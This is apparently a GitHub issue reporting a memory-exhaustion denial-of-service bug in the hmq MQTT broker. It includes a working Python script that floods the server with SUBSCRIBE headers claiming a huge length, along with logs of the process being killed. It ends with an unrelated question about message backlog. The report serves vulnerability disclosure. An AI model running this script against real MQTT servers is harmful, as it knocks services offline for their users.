fhmq/hmq

The memory of hmq can be easily filled up, causing hmq excessive memory use and crashed.

AAArdu opened this issue · 1 comments

Description

Hi, I found the memory of hmq can be easily filled up with a simple MQTT message which has big length field. Sending such message to the server can easily make the server consume excessive memory use and make the server crash down (kill by system). It seems there is an issue in memory allocation and control. This may be a threaten and exploited by attackers to do the Dos attack.

A similar threaten can refer to CVE-2017-7651

Note that even unauthorized attackers can do this.

Environment

docker Ubuntu 20.04.3 LTS with 4GB RAM

hmq (github commit b2e79c3 on Jun 18)

go version go1.19

Attack simulation

run server

hmq --port 1883

run attack script

the attack script (in python) may seems like

import socket
import threading
import time

ip_address = "0.0.0.0"
port = 1883

payload = b"\x80\xff\xff\xff\x7f" # mqtt SUBSCRIBE type message

###[ MQTT fixed header ]### 
#   type      = SUBSCRIBE
#   DUP       = Disabled
#   QOS       = At most once delivery
#   RETAIN    = Disabled
#   len       = 268435455

def send_attack():
    soc = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    soc.connect((ip_address,port))

    soc.sendall(payload)
    soc.close()

while(True):
    for i in range(15):
        t = threading.Thread(target=send_attack)
        t.setDaemon(True)
        t.start()
    time.sleep(1)

Result

the server consumes excessive memory and killed by system.

...
{"level":"error","timestamp":"2022-12-27T13:30:01.462Z","logger":"broker","caller":"broker/broker.go:314","msg":"read connect packet error","error":"EOF"}
{"level":"error","timestamp":"2022-12-27T13:30:01.466Z","logger":"broker","caller":"broker/broker.go:314","msg":"read connect packet error","error":"EOF"}
{"level":"error","timestamp":"2022-12-27T13:30:01.469Z","logger":"broker","caller":"broker/broker.go:314","msg":"read connect packet error","error":"EOF"}
{"level":"error","timestamp":"2022-12-27T13:30:01.472Z","logger":"broker","caller":"broker/broker.go:314","msg":"read connect packet error","error":"EOF"}
{"level":"error","timestamp":"2022-12-27T13:30:01.475Z","logger":"broker","caller":"broker/broker.go:314","msg":"read connect packet error","error":"EOF"}
Killed

A large number of messages are pushed to the topic, and if there is no consumer consumption for a long time, the memory usage of the broker keeps growing and messages keep piling up. How to solve this situation?